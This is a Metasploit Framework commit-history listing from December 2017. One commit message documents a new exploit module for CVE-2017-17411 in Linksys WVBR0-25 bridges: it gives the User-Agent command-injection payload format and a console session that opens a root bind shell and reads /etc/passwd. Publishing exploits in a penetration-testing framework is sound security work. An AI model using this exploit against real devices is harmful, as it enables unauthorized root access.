Commit Graph

45114 Commits (9db75849a964782d7b15eb9417360f571c8d7e98)

Author SHA1 Message Date
Brent Cook c2bb144d0f
Land #9302, Implement ARD auth and add remote CVE-2017-13872 (iamroot) module 2017-12-28 14:11:26 -06:00
Metasploit c681c7881d
Bump version of framework to 4.16.28 2017-12-28 10:03:39 -08:00
Brent Cook 8c2c30c230
Land #9330, add MQTT scanner 2017-12-27 22:32:59 -06:00
Brent Cook ae17943d4c fix documentation preformat blocks 2017-12-27 22:32:26 -06:00
Brent Cook 6f1196d30c clarify what's happening when there is a connection failure 2017-12-27 22:32:08 -06:00
james fad4ccece9 Only use basic auth in couchdb_enum when credentials are provided 2017-12-27 20:16:01 -06:00
Jon Hart bbed7db13c
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-27 13:08:44 -08:00
Jeffrey Martin 8ea50572df
Land #9329, Add basic framework for interacting with MQTT 2017-12-27 14:59:34 -06:00
Tod Beardsley e6de25d63b
Land #9316 Cambium modules and mixins, tx @juushya
These cover several of the CVEs mentioned in

https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
Tod Beardsley 1bb2bb9d2c Oops, no admin in that path 2017-12-26 12:06:45 -06:00
Tod Beardsley 9af88681a2
Move deprecation out 60 days 2017-12-26 11:56:47 -06:00
juushya 8b0f2214b1 few more updates 2017-12-23 03:04:11 +05:30
b0yd 7aa296577e Added readme 2017-12-22 14:34:35 -05:00
juushya 038119d9df Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more 2017-12-23 00:14:27 +05:30
Jon Hart d4bc98c13f
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-22 08:07:40 -08:00
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Tod Beardsley 674397fa06
Merge pull request #19 from jhart-r7/pr/9316
Correct permissions, fixing warning
2017-12-22 09:45:43 -06:00
Jon Hart b29948412e
Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu dc2b5df2ef
Update LICENSE for mysql_udf_payload 2017-12-21 21:03:22 -06:00
William Vu caae33b417
Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 96cff8b615
Merge pull request #1 from headlesszeke/headlesszeke-cve-2017-17411
Adds exploit module for CVE-2017-17411
2017-12-21 17:51:35 -06:00
headlesszeke 2ee42e1433
Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root0:0::/:/bin/sh nobody99:99:Nobody:/:/bin/nologin sshd22:22::/var/empty:/sbin/nologin admin1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Metasploit 909caa0425
Bump version of framework to 4.16.27 2017-12-21 13:27:52 -08:00
Brent Cook 9d8cb8a8d0 Merge branch '4.x' into upstream-master 2017-12-21 15:17:38 -06:00
Metasploit ee2f10efc5
Bump version of framework to 4.16.26 2017-12-21 10:04:38 -08:00
Tod Beardsley 5dfb5d581a
Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart becc05b4f1
Cleaner client_id handling 2017-12-21 06:57:33 -08:00
Jon Hart 157d973194
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:13:34 -08:00
Jon Hart 82bdce683b
Remove to_s 2017-12-20 19:13:12 -08:00
Jon Hart adca42f311
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:11:52 -08:00
Jon Hart b78f1105f7
Add missing port 2017-12-20 19:11:33 -08:00
Jon Hart 917e9aa328
Doc READ_TIMEOUT 2017-12-20 19:10:49 -08:00
Jon Hart bedc276225
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 19:09:51 -08:00
Jon Hart ddb2566f3b
Remove duplicate options, set less suspicious client_id 2017-12-20 19:09:35 -08:00
Jon Hart 962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart cf21d13b2e
Resolve conflict 2017-12-20 18:58:16 -08:00
Jon Hart 9c0df54f36
syntax 2017-12-20 18:54:09 -08:00
Jon Hart fa1536209a
syntax 2017-12-20 18:52:34 -08:00
Jon Hart 508253eadc
More docs 2017-12-20 18:51:44 -08:00
Jon Hart 0f72ce1ee5
Add WIP documentation for auxiliary/scanner/mqtt/connect 2017-12-20 18:45:10 -08:00
Jon Hart 298cb16b1a
Set default USER/PASS files 2017-12-20 18:44:43 -08:00
Jon Hart 37ae5e1303
Add admin as a default unix passwd 2017-12-20 18:44:21 -08:00
William Vu 1975713a92
Land #9333, get_cookies_parsed using CGI::Cookie 2017-12-20 20:08:33 -06:00